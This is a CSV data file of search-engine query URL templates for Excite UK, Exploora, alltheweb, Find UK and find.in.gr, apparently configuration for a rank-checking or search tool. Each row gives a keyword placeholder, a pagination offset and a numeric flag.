"International","Excite UK 4 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=30","0"
"International","Excite UK 4 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=29&nosplash=0&ovr=1&xargs=0&ppargs=","0"
"International","Excite UK 4 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=29&nosplash=0&ovr=1&xargs=0&ppargs=","0"
"International","Excite UK 4 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=30","0"
"International","Excite UK 5 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=39&nosplash=0&ovr=1&xargs=0&ppargs=","1"
"International","Excite UK 5 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=40","0"
"International","Excite UK 5 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=40","0"
"International","Excite UK 5 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=39&nosplash=0&ovr=1&xargs=0&ppargs=","0"
"International","Excite UK 5 (Next 10)","http://search-dyn.excite.co.uk/search.php?excitetype=web&key={SEARCH_KEYWORD}&exclude=&collection=web&language=&offset=39&nosplash=0&ovr=1&xargs=0&ppargs=","0"
"International","Excite UK 5 (Next 10)","http://www.excite.co.uk/search/web/results?q={SEARCH_KEYWORD}&l=&c=web&ovr=6&offset=40","0"
"International","Exploora Br","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=0&cor=8&tx=2","1"
"International","Exploora Br","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=0&trp=116&tx=&ft=","0"
"International","Exploora Br","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=0&trp=116&tx=&ft=","0"
"International","Exploora Br","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=0&cor=8&tx=2","0"
"International","Exploora Br","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=0&cor=8&tx=2","0"
"International","Exploora Br","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=0&trp=116&tx=&ft=","0"
"International","Exploora Br 2 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=1&trp=116&tx=&ft=","1"
"International","Exploora Br 2 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=1&trp=116&tx=&ft=","0"
"International","Exploora Br 2 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=1&trp=116&tx=&ft=","0"
"International","Exploora Br 2 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=1&trp=115&tx=2&ft=&cor=8","1"
"International","Exploora Br 2 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=1&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 2 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=1&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 3 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=2&trp=116&tx=&ft=","1"
"International","Exploora Br 3 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=2&trp=116&tx=&ft=","0"
"International","Exploora Br 3 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=2&trp=116&tx=&ft=","0"
"International","Exploora Br 3 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=2&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 3 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=2&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 3 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=2&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 4 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=3&trp=116&tx=&ft=","1"
"International","Exploora Br 4 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=3&trp=116&tx=&ft=","0"
"International","Exploora Br 4 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=3&trp=116&tx=&ft=","0"
"International","Exploora Br 4 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=3&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 4 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=3&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 4 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=3&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 5 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=4&trp=116&tx=&ft=","1"
"International","Exploora Br 5 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=4&trp=116&tx=&ft=","0"
"International","Exploora Br 5 (Next 10)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=4&trp=116&tx=&ft=","0"
"International","Exploora Br 5 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=4&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 5 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=4&trp=115&tx=2&ft=&cor=8","0"
"International","Exploora Br 5 (Next 12)","http://www.exploora.com.br/ebusca.php?busca={SEARCH_KEYWORD}&p=4&trp=115&tx=2&ft=&cor=8","0"
"International","Fast","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100","1"
"International","Fast","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=0","0"
"International","Fast","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=0","0"
"International","Fast","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100","0"
"International","Fast","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100","0"
"International","Fast","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=0","0"
"International","Fast 10 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=900","1"
"International","Fast 10 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=900","0"
"International","Fast 10 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=900","0"
"International","Fast 10 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=900","0"
"International","Fast 10 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=900","0"
"International","Fast 10 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=900","0"
"International","Fast 11 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=1000","1"
"International","Fast 11 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=1000","0"
"International","Fast 11 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=1000","0"
"International","Fast 11 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=1000","0"
"International","Fast 11 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=1000","0"
"International","Fast 11 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=1000","0"
"International","Fast 2 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=100","1"
"International","Fast 2 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=100","0"
"International","Fast 2 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=100","0"
"International","Fast 2 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=100","0"
"International","Fast 2 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=100","0"
"International","Fast 2 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=100","0"
"International","Fast 3 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=200","1"
"International","Fast 3 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=200","0"
"International","Fast 3 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=200","0"
"International","Fast 3 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=200","1"
"International","Fast 3 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=200","0"
"International","Fast 3 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=200","0"
"International","Fast 4 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=300","1"
"International","Fast 4 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=300","0"
"International","Fast 4 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=300","0"
"International","Fast 4 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=300","0"
"International","Fast 4 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=300","0"
"International","Fast 4 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=300","0"
"International","Fast 5 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=400","1"
"International","Fast 5 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=400","0"
"International","Fast 5 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=400","0"
"International","Fast 5 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=400","0"
"International","Fast 5 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=400","0"
"International","Fast 5 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=400","0"
"International","Fast 6 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=500","1"
"International","Fast 6 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=500","0"
"International","Fast 6 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=500","0"
"International","Fast 6 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=500","0"
"International","Fast 6 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=500","0"
"International","Fast 6 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=500","0"
"International","Fast 7 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=600","1"
"International","Fast 7 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=600","0"
"International","Fast 7 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=600","0"
"International","Fast 7 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=600","0"
"International","Fast 7 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=600","0"
"International","Fast 7 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=600","0"
"International","Fast 8 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=700","1"
"International","Fast 8 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=700","0"
"International","Fast 8 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=700","0"
"International","Fast 8 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=700","0"
"International","Fast 8 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=700","0"
"International","Fast 8 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=700","0"
"International","Fast 9 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=800","1"
"International","Fast 9 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=800","0"
"International","Fast 9 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=800","0"
"International","Fast 9 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=800","0"
"International","Fast 9 (Next 100)","http://www.alltheweb.com/search?advanced=1&cat=web&jsact=&_stype=norm&type=any&q={SEARCH_KEYWORD}&hits=100&o=800","0"
"International","Fast 9 (Next 100)","http://www.alltheweb.com/search?cat=web&cs=utf8&q={SEARCH_KEYWORD}&rys=0&itag=crv&_sb_lang=pref&o=800","0"
"International","Find UK","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?vid=l21211110225I1046215587&category=&lout=dyn&refer=&query={SEARCH_KEYWORD}","1"
"International","Find UK","http://www.find-uk.com/found/uk.php?qry_str={SEARCH_KEYWORD}&language=en&geo=uk&per_page=%24out%7Bper_page%7D&submit=%A0%A0%A0Find%A0%A0%A0","0"
"International","Find UK","http://www.find-uk.com/found/uk.php?qry_str={SEARCH_KEYWORD}&language=en&geo=uk&per_page=%24out%7Bper_page%7D&submit=%A0%A0%A0Find%A0%A0%A0","0"
"International","Find UK","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?vid=l21211110225I1046215587&category=&lout=dyn&refer=&query={SEARCH_KEYWORD}","0"
"International","Find UK","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?vid=l21211110225I1046215587&category=&lout=dyn&refer=&query={SEARCH_KEYWORD}","0"
"International","Find UK","http://www.find-uk.com/found/uk.php?qry_str={SEARCH_KEYWORD}&language=en&geo=uk&per_page=%24out%7Bper_page%7D&submit=%A0%A0%A0Find%A0%A0%A0","0"
"International","Find UK 2 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=2&per_page=10&geo=uk&language=en&advanced=&category=web","1"
"International","Find UK 2 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=2&per_page=10&geo=uk&language=en&advanced=&category=web","0"
"International","Find UK 2 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=2&per_page=10&geo=uk&language=en&advanced=&category=web","0"
"International","Find UK 2 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=2","0"
"International","Find UK 2 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=2","0"
"International","Find UK 2 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=2","0"
"International","Find UK 3 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=3&per_page=10&geo=uk&language=en&advanced=&category=web","1"
"International","Find UK 3 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=3&per_page=10&geo=uk&language=en&advanced=&category=web","0"
"International","Find UK 3 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=3&per_page=10&geo=uk&language=en&advanced=&category=web","0"
"International","Find UK 3 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=3","0"
"International","Find UK 3 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=3","0"
"International","Find UK 3 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=3","0"
"International","Find UK 4 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=4&per_page=10&geo=uk&language=en&advanced=&category=web","1"
"International","Find UK 4 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=4&per_page=10&geo=uk&language=en&advanced=&category=web","0"
"International","Find UK 4 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=4&per_page=10&geo=uk&language=en&advanced=&category=web","0"
"International","Find UK 4 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=4","0"
"International","Find UK 4 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=4","0"
"International","Find UK 4 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=8299525647I1055922363&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=4","0"
"International","Find UK 5 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=5&per_page=10&geo=uk&language=en&advanced=&category=web","1"
"International","Find UK 5 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=5&per_page=10&geo=uk&language=en&advanced=&category=web","0"
"International","Find UK 5 (Next 10)","http://www.find-uk.com/found/uk.php?qry_id=1125147056.2795&qry_str={SEARCH_KEYWORD}&extra_qry=&page=5&per_page=10&geo=uk&language=en&advanced=&category=web","0"
"International","Find UK 5 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=314253457I1055940096&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=5","0"
"International","Find UK 5 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=314253457I1055940096&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=5","0"
"International","Find UK 5 (Next 20)","http://www.find-uk.com/cgi-bin/search/uksearch/index.pl?where=uk&target=uk&vid=l21211110225I1046215587&adv=&tag=314253457I1055940096&refer=&sel=n&con=y&category=&query={SEARCH_KEYWORD}&lout=dyn&sum=n:n&pg=5","0"
"International","find.in.gr","http://find.in.gr/results.page?page=1&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr","http://find.in.gr/results.page?page=1&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr","http://find.in.gr/results.page?page=1&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr","http://find.in.gr/results.page?page=1&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr","http://find.in.gr/results.page?page=1&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr","http://find.in.gr/results.page?page=1&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 10","http://find.in.gr/results.page?page=10&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 10","http://find.in.gr/results.page?page=10&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 10","http://find.in.gr/results.page?page=10&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 10","http://find.in.gr/results.page?page=10&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 10","http://find.in.gr/results.page?page=10&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 10","http://find.in.gr/results.page?page=10&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 2","http://find.in.gr/results.page?page=2&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 2","http://find.in.gr/results.page?page=2&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 2","http://find.in.gr/results.page?page=2&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 2","http://find.in.gr/results.page?page=2&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 2","http://find.in.gr/results.page?page=2&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 2","http://find.in.gr/results.page?page=2&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 3","http://find.in.gr/results.page?page=3&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 3","http://find.in.gr/results.page?page=3&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 3","http://find.in.gr/results.page?page=3&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 3","http://find.in.gr/results.page?page=3&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 3","http://find.in.gr/results.page?page=3&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 3","http://find.in.gr/results.page?page=3&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 4","http://find.in.gr/results.page?page=4&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 4","http://find.in.gr/results.page?page=4&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 4","http://find.in.gr/results.page?page=4&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 4","http://find.in.gr/results.page?page=4&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 4","http://find.in.gr/results.page?page=4&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 4","http://find.in.gr/results.page?page=4&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 5","http://find.in.gr/results.page?page=5&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 5","http://find.in.gr/results.page?page=5&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 5","http://find.in.gr/results.page?page=5&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 5","http://find.in.gr/results.page?page=5&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 5","http://find.in.gr/results.page?page=5&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 5","http://find.in.gr/results.page?page=5&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 6","http://find.in.gr/results.page?page=6&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 6","http://find.in.gr/results.page?page=6&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 6","http://find.in.gr/results.page?page=6&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 6","http://find.in.gr/results.page?page=6&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 6","http://find.in.gr/results.page?page=6&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 6","http://find.in.gr/results.page?page=6&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 7","http://find.in.gr/results.page?page=7&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 7","http://find.in.gr/results.page?page=7&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 7","http://find.in.gr/results.page?page=7&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 7","http://find.in.gr/results.page?page=7&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 7","http://find.in.gr/results.page?page=7&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 7","http://find.in.gr/results.page?page=7&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 8","http://find.in.gr/results.page?page=8&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 8","http://find.in.gr/results.page?page=8&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 8","http://find.in.gr/results.page?page=8&channel=1&data={SEARCH_KEYWORD}","0"
